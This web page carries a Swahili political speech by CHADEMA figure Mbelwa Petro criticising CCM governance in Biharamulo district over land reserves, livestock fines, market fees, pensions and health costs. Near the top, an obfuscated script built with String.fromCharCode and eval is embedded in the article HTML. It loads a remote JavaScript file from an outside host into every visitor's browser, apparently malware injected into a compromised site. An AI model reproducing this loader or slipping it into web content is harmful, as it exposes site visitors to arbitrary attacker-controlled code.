Recent Comments

Hotuba ya Mwl. Mbelwa Petro, Biharamulo

By Baraka Bitariho Jun 1, 2023
<p>Mheshimiwa Mbelwa Petro, Wilayani Biharamulo</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Hotuba ya Mwl. Mbelwa Petro kwenye mkutano wa hadhara uliofanyika kata ya Kabindi, Biharamulo 30/05/2023.
Bwana Yesu apewe sifa!Mheshimiwa Mbelwa Petro, Wilayani Biharamulo

Assalaam Aleykum!
Mungu ni Mwema…… Na wakati wote…….
Makamanda peoples!
Naitwa Mwl. Mbelwa Petro, kwa nafasi moja Mimi ni Mwananchi mwenzenu ninayeteseka na utawala wa CCM nikitokea upande wa Biharamulo Mjini Mtaa wa Maendeleo na kwa nafasi nyingine Mimi ndiye nilikuwa Mgombea wa kiti cha Ubunge kupitia CHADEMA katika jimbo letu la Biharamulo kwenye uchafuzi mkuu wa mwaka 2020.
Naungana na viongozi wenzangu wa Chama kuwashukuru wananchi wenzangu wote kwa kujitokeza kuhudhuria mkutano wetu CHADEMA kwani najua mmesitisha kwa muda shughuli za kutafuta unga na madaftari ya watoto kwa muda ili mje kutusikiliza.
Nawapongeza na viongozi wetu wageni kwa utume wenu kuzunguka nchi nzima mkihubiri haki na Maendeleo ya kweli tunayoyataka Watanzania. Hongereni sana, kuleni 5 zangu za hewani.
Wapambanaji wenzangu wa Kabindi, tangu uchafuzi mkuu wa 2020 utamatike Mimi na ninyi hatukuwahi kukutana katika mazingira ya makutano kama haya, na kama Wazee wa kale wa Kabila la Wasubi walivyowahi kunena, ya kuwa “HOBHONELA OMUKAMA NIHO OLAMILIZA”, basi nami naomba niitumie nafasi hii fupi ya kukutana nanyi kuwashukuru kwa kura nyingi mlizonipigia mwaka 2020 kwenye kiti cha Ubunge. Niwashukuru pia kwa niaba ya Tundu Lssu kwa kumpigia kura nyingi kwenye kiti cha Urais katika uchafuzi huo. Nisiache pia kuwashukuru wananchi wa ukanda wa Runazi-Kabindi kwa kuwapigia kura za ushindi waheshimiwa Madiwani wa Chama chetu cha CHADEMA waliogombea kata za Runazi, Kabindi, Nyamigogo, Nyabusozi,  Katahoka na Nemba. Kwa haki tulishinda, kwa wizi tulishindwa. Tusijilaumu tukaonekana ni watu tunaomfundisha kazi Mungu, Mimi najua fika Mungu huyu wa Mbinguni aliweka kila kitu sawa baada ya dhambi ile kufanyika.
Wananchi wenzangu wa Kabindi, tujuzane tu kwamba Biharamulo ni wilaya iliyoasisiwa mwaka 1961. Ilipofika mwaka 1983 ilianzishwa Halmashauri ambayo ilikuja kuanza kazi mwaka uliofuata wa 1984. Ilipofika mwaka 2007 wilaya ya Biharamulo ilimegwa maeneo yaliyounda wilaya mpya ya Chato. Baada ya mabadiliko hayo ya kiutawala, wilaya yetu kongwe ya Biharamulo ilibakiwa na ukubwa wa 5,627km², kati ya eneo hilo eneo lenye maji ni 10km² na eneo lenye Ardhi ni 5,617km².
Ambapo kiutawala, wilaya yetu imegawanywa katika Tarafa mbili, Kata 17, Vijiji 74 na Vitongoji 373.
Kwa mujibu wa Sensa ya mwaka 2012 idadi ya watu ilikuwa ni 323,486 huku matokeo rasmi ya sensa ya mwaka 2022 tukiwa ni 457,114 tunaoishi kwenye jumla ya kaya 87,733.
Kati yetu, 85% ya wananchi wa Biharamulo tunategemea shughuli za kilimo kujipatia kipato chetu na cha Taifa, 7% wakifanya ufugaji katika kulijenga Taifa, 5% hufanya shughuli za biashara, 1.6% ni watumishi wa sekta rasmi ikiwemo ya UMMA na Binasfi na 1.4% hufanya shughuli nyingine ikiwemo uselemala, usafirishaji, uchimbaji madini na uvuvi.
Hii ina maanisha shughuli za kilimo, ufugaji na biashara ndio shughuli zinazochangia uchumi wa wananchi wa Biharamulo kwa 97%. Shughuli hizi hutegemea ardhi kama roho yake.
Pamoja na kuwa CCM wanajua ardhi ni roho ya uchumi wetu Biharamulo, lakini haohao wametunyang’anya 54% ya ardhi yetu sawa na 3033km² na kuigeuza kuwa hifadhi hivyo haturuhusiwi kufanya shughuli yoyote huko iwe kilimo, ufugaji wala biashara. Wananchi tumebakiwa 46% tu sawa na 2583km² tu ambazo hazitutoshi kufanya kilimo kikubwa na cha kisasa kama tunavyotamani. Na sasa wafugaji wetu wameachwa bila maeneo ya malisho.
1. Vijana wengi waliojaribu kuulaani umasikini kwa kulima maeneo hayo wameishia kukamatwa na kupotezwa, wapo wengine ambao wanakamatwa na kukatwa nyayo wa miguu yao, wengine wanaisha jela.
2. Wafugaji wenzetu wakimatiwa ng’ombe zao kwenye maeneo hayo wakikoswa pesa ya kuwahonga wakamataji, basi wanawatozwa faini ya Tsh. 100,000 kwa kila Ng’ombe mmoja bila huruma, hata awe ndama. Hii ina maana mfugaji mwenzetu akikamatiwa ng’ombe wake 20 atauza ng’ombe wake wanne apate Tsh. 2,000,000 ili akomboe ng’ombe wake. Hivyo akikamatiwa Ng’ombe mara tano atabaki na fimbo na zizi bila ng’ombe, wote wataishia mikononi mwa Serikali ya CCM. Madiwani na Mbunge wa CCM wamepitisha utaratibu huu wa kinyonyaji ili wafugaji wafisilike.
3. Wafanyabiashara wetu katika Fremu 25 za Soko la Kabindi wanatozwa kodi ya pango Tsh. 30,000 badala ya Tsh. 15,000 inayoelekezwa na Sheria ndogo za Ada na Ushuru za Halmashauri ya Biharamulo. Hii ni sawa na kusema WAFANYABIASHARA hawa wanaibiwa Tsh. 15,000 kila mwezi kwa kutozwa ushuru mkubwa zaidi ya ulioamriwa kulipwa. Ukizidisha 15,000 kwa mwaka, basi Mfanyabiashara mmoja atakuwa ameibiwa 180,000. Kwa Mfanyabiashara, hii pesa ni kubwa mno. Wizi huu unafanyika hata kwenye vibanda vingine vinavyozunguuka soko hili ambapo wamiliki wa vibanda hivi wanatozwa Tsh. 10,000 badala ya Tsh. 5,000. Mbunge Ezra wa CCM hana maumivu na hili, yupo bungeni anaabudu na kusifu utawala, jukumu ambalo si lake kikatiba. Amesahau kuwa yeye ni sehemu ya wananchi na si sehemu ya Serikali yaani bosi wa Ezra sio Mama Samia wala Waziri wa fedha Mwigulu Nchemba, bosi wa huyu Mtu ni wananchi wa Kabindi na Biharamulo.
4. Watumishi wenzangu wa hapa Kabindi na nchi hii kwa ujumla, Walimu, Manesi, Madaktari, Maaskari, Watumishi idara za Halmashauri wanaibiwa pesa yao wakati wa kustaafu kupitia kikokotoo limbikizi cha kulipwa kwa Mkupuo 33% huku pesa yao halali 67% inabaki Serikalini. Watumishi hawa kila mwezi wanakatwa pesa yao na kuhifadhiwa kwenye mifuko ya hifadhi ya jamii ya PSSSF na NSSF lakini Serikali ya CCM inapofika muda  wa watumishi wetu kustaafu inawawekea formula ngumu ya kuwalipa hela yao halali. Pesa ni ya kwao kwanini serikali itumie formula ngumu kuwalipa?
Mfano rahisi ni hivi, ikiwa mtumishi amechangia michango ya Tsh. 10,000,000 katika muda wake wote wa Utumishi basi Serikali ya CCM inampa kwa mkupuo Tsh. 3,300,000 tu halafu 6,700,000 inabaki Serikalini. Hii si haki kwa kuwa hii pesa, Mstaafu akishalipa madeni yake, akakarabati Nyumba yake ya kustaafu na akalipia ada za watoto wake vyuoni basi, Mtumishi huyu hatobakiwi hata na pesa ya kufanya mradi wa kisasa wa kilimo cha parachichi. Kumlipa Mstaafu kwa mkupuo wa 33% halafu 67% ikabaki Serikalini ni uonevu kwa wapambanaji hawa wanaofanya kazi katika mazingira duni kila siku ili nchi iende. Shukrani ya Serikali ni kuwapunja stahiki zao ili waendelee kuishi Maisha magumu na ya utegemezi kwa miaka yao yote mpaka kufa kwao. Wakati wabunge wa Bunge lililojaa wanaCCM likiwatungia Maaskari walipwe 33% ya penseni ya kwa mkupuo, wabunge hawa hawa wao wamejitungia sheria ya kulipwa 100% kwa mkupuo baada ya miaka mitano tu Bungeni. Kama malipo ya 33% yanafaa, basi kwanini yasifae pia kwa wabunge wa CCM waliopitisha sheria hii? Wabunge wa CCM wana ziada ipi ya utu ambayo Walimu na Madaktari wameikosa? Huu ni ukoloni wa Mwafrika dhidi ya Mwafrika mwenzake.
5. Kwenye huduma za afya wananchi wenzangu wa hapa Kabindi na nchi hii nzima tunateseka mno, tukiugua basi tumefilisika. Serikali ya CCM imepandisha gharama za matibabu utafikiri ni huduma ya starehe. Tukiugua tukaenda hospitali tunalipishwa pesa ya kufungua faili la kutibiwa, tunalipia pesa ya kumwona daktari, tunalipishwa pesa ya vipimo maabara, tunalipishwa pesa ya kitanda tukilazwa na hata tunapokufa huwa tunalipia gharama za vifo vyetu Mortuary. Mwili wa Marehemu aliyefia hospitalini mpaka unapigiwa hesabu ya dawa alizoandikiwa kabla hujakata roho ili azilipe ndipo aruhusiwe kwenda kuzikwa. CCM hawatuonei huruma hata  tukiwa tumepoteza uhai wetu, CCM wanataka tuwalipe pesa wakanunue magari ya kifahari na kuwasomesha watoto wao kwenye shule za kimataifa huku sisi watoto wetu wanakaa 200 kwenye darasa moja. Na dhahama hii inawakumba hata wananchi wenzetu wa Chama cha Mapinduzi (CCM).
6. Kwa mujibu wa ripoti ya  Mdhibiti na Mkaguzi wa hesabu za Serikali (CAG) iliyotolewa Mwezi Aprili, 2023, kwenye ukurasa wa 169, 170 na 190 CAG  alibaini wizi wa jumla ya Tsh. 932,000,000 kwenye Halmashauri yetu ya Biharamulo. Hii 932,000,000 ina jumla ya noti 93,200 za Tsh. 10,000 ambapo kila noti moja ya 10,000 ina uzito wa gramu 1, hivyo jumla ya pesa yenye uzito wa gramu 93,200 sawa na kilo 93.2 za uzito zimeibwa. Hizi kilo 93.2 zina uzito unaokaribiana na mifuko miwili ya simenti.
Kikundi cha watu wachache kimeiba pesa hii kwenye Halmashauri yetu. Halafu linapokuja suala la michango ya karatasi za limu na kuchangia Mradi wa Benki ya Matofali wa Mwenyekiti wa CCM (W) ya Biharamulo Mzee Malulu, Mwananchi anatafutwa na migambo? Huu ni ujinga wa kiuongozi.
Yaani ni sawa kusema hizi pesa zilizoibwa zikifungwa katika maburungutu ya Tsh. 100,000 nikapewa hapa jukwaani ili nizigawe kipedejee kwa burungutu, basi nitahitaji sekunde 9,320 sawa na masaa 2.5 ndipo nimalize kazi ya kuzigawa kwa kuzirusha.
Pamoja na kuwa Halmashauri yetu ina uchafu huu, Madiwani wetu Biharamulo wanakwenda kwenye baraza la Madiwani kujadili umbeya na unyankuzi eti “WALIMU WANATUMIA VISHIKWAMBI KUTONGOZA mara WAALIMU BIHARAMULO WANAFANYA BIASHARA YA NGONO?” Hawa Madiwani wetu akiwemo huyu Lubhula wa Kata hii ya Kabindi na Mbunge Ezra wanatenga muda kujadili haya mambo yasiyo na Msingi, na wakimaliza kujadili upuuzi huu wanasaini posho wanarudi nyumbani wakiwa na Nyama choma pamoja bia huku sisi wananchi tunasaka kwa taabu mahindi ya kuchangia uji wa watoto shuleni.
Madiwani wa Biharamulo wanajua fika kuwa watoto wetu wanasomea chini ya Miti na wanakosa madawati darasani halafu Madiwani hawahawa wanatenga ratiba ya baraza kujadili maisha binafsi ya wananchi wao? Wanashindwa kujadili jinsi Serikali inavyopeleka pesa isiyotosha ya kugharamia Elimu bure mashuleni, wako wanajadili umbea wa walimu kufanya biashara ya ngono pasina ushahidi wowote.
Madiwani wanawaonea wivu walimu kupewa vishikwambi na sasa wanawasimanga eti wanavitumia kutongoza?? Kwamba walimu hawakujua kutongoza kabla ya kupatiwa vishikwambi? Wadhalilishaji wakubwa hawa Madiwani.
Madiwani wa Biharamulo hawajui kuwa walimu wana simu binafsi zenye ubora mara 10 ya vishikwambi hivi? Au wanadhani vishikwambi ni maajabu? Wanafikiri walimu wangeshindwa kununua vishikwambi hivyo kwa pesa yao?
Huwezi kudhalilisha taaluma ya ualimu kiasi hiki. Walimu wanafundisha wanafunzi wengi kila siku, wanatumia muda na akili zao zote kuondoa ujinga kwa watoto wetu katika mazingira magumu lakini bado Madiwani wanawashambulia kwa dharau na dhihaka kama hizi! Shule zetu hazina Maabara za kuwafundisha watoto wetu masomo ya sayansi, Madiwani wa CCM hawaoni changamoto hii lakini wao wanaona walimu kutongozea vishikwambi, uzushi tu.
CHADEMA tunashauri mambo yafuatayo ili kupanua wigo wa kiuchumi kwa wilaya yetu:
1. Kuchorwa upya kwa mipaka ya hifadhi ili wakulima na wafugaji wapatiwe maeneo ya kutosha kwa ajili ya shughuli zao za kimaendelo. CHADEMA tunapendekeza eneo la hifadhi libaki 1800km² ili wananchi tupate maeneo ya kutosha kwa ajili ya kufanya kilimo cha kisiasa na cha kisasa na wafugaji watenengewe maeneo ya kutosha ya kulishia Mifugo yao.
2. Serikali iache kuwaibia wafugaji wetu kwa kuwatoza fine kubwa na rushwa pale inapokamata mifugo yao badala yake CHADEMA tunaishauri serikali ipime na kutenga maeneo kwa ajili ya malisho ya Mifugo yao. Hii itasaidia kumaliza ugomvi kati ya wakulima na wafugaji unaoendelea kwenye Vijiji vyetu.
3. CHADEMA tunaisistiza Halmashauri kuzingatia Sheria elekezi za Ada na Ushuru za Halmashauri ya wilaya ya Biharamulo ambazo zinaelekeza Wafanyabiashara watozwe Tsh. 15,000 kwa mwezi kama pango la vibanda na 5,000 kama ushuru wa kibanda na sio 30,000 na 10,000 mtawalia kama ilivyo sasa.
4. CHADEMA tunashauri Watumishi wastaafu walipwe 75% kwa mkupuo ya kiinua mgongo na 25% iliyobaki walipwe kama pensheni ya kila mwezi mpaka kufa kwao. CHADEMA tunashauri suala la maslahi ya watumishi wastaafu liandikwe kwenye KATIBA MPYA, tofauti na sasa ambapo linaamriwa na WANASIASA WALAFI.
5. Serikali izingatie kuwapatia matibabu bila malipo Wazee wetu, wajawazito na watoto  kama Sera ya Afya ya 2007 inavyoelekeza. Wakati Wazee wetu wakikosa Dawa Mahospitalini, tunasikia huko viongozi wananunua magoli ya Yanga na Simba kwa Tsh. 5,000,000 kila goli. Hatukatai hamasa ya michezo lakini tunamtaka Mama Samia kuongeza bajeti ya madawa muhimu kwenye vituo vyetu vya kutolea Huduma za afya.
6. CHADEMA tunaitaka Halmashauri kutoa ripoti ya mienendo ya uuzaji wa viwanja vya eneo la CHEMA Lusahunga, Eneo la Block D Nyakanazi na eneo la CHEBHITOTE la hapa Runazi-Kabindi kwani kuna harufu ya wizi kwenye uuzaji wa viwanja hivyo ambapo wizi huu unamhusisha na Mbunge Ezra John kwa kuchezesha mifumo na taratibu za malipo kwenye manunuzi ya viwanja vya Nyakanazi.
Katiba ya sasa ya Tanzania yenye sura 10 na Ibara 52 iliyoandikwa 1977 inawalinda wezi wa pesa za UMMA. Wezi wa kuku wamekuwa wakihukumiwa mara nyingi na kwa haraka kuliko wezi wa kodi za wananchi, ndio maana wezi wa mabilioni ya MEREMETA wako huru, wezi wa mabilioni ya EPA wako huru, wezi wa skendo ya RICHMOND wako huru, wezi wa mabilioni ya TEGETA ESCROW wako huru, wezi Kodi zetu tangu tumepata Uhuru hawakuwahi kuhukumiwa.
Kwenye Uchafuzi wa mwaka 2020 hapa Biharamulo, CCM waliiba mfumo mzima wa uchaguzi, tukapata Rais, Wabunge na Madiwani ambao hawakutokana na kura zetu wananchi.
Nawasihi wananchi wenzangu mjiandae kugombea nafasi za Vitongoji, Vijiji na Mitaa yetu hapo mwaka kesho 2024, hawa walioteuliwa kutuongoza  wamekuwa wafanya biashara wa kugonga mihuri tu. Badala ya kutuongoza, wanatutongoza kutoa Rushwa ya kugongewa mihuri yao tu.
Huyu Mbunge wa sasa alitudanganya kuwa akipata Ubunge ataishi hapa lakini mpaka leo hajawahi kuishi hapa, anakuja Biharamulo na kufikia kwa watu. Akimaliza ziara za masaa matano jimbo zima, anabeba begi lake na kurudi zake nyumbani kwake Dar es salaam. Wananchi tunabaki tunahudumiwa na makatibu wake ambao wamezagaa kila mtaa.
Pamoja na kuwa Bunge la JMT linampa Mbunge Ezra Lita 1,000 za mafuta kila mwezi kwa ajili ya shughuli jimboni lakini Lori lake alilolileta kwa ajili ya huduma jimboni mwananchi hatolipata mpaka amelipa pesa ya mafuta, hata uwe ni msiba. Limekuwa ni gari la biashara kama mengine, si la huduma tena.
Mbunge Ezra amekazana kuiomba Serikali ijenge tochi za solar kila Senta ya Miji na Kijiji, nani alimwambia kuwa wananchi wa Kabindi kipaumbele chenu ni taa za Sentani? Kwa ufahamu wake anadhani wana Kabindi tunazichovya ugali hizo taa? Ama watoto wetu wanazitumia taa hizo kwa ajili ya kujisomea nyakati za usiku? Kabindi tunataka mtandao wa nguzo za umeme uongezwe Vitongojini kwetu ili tupate umeme majumbani mwetu sio umeme wa barabarani.
Mwisho, NAWAAMBIA: Inye ntiniswa muyaga nkebhisenkele bye ngemu.
Ahsanteni wote, nawatakia nyakati njema.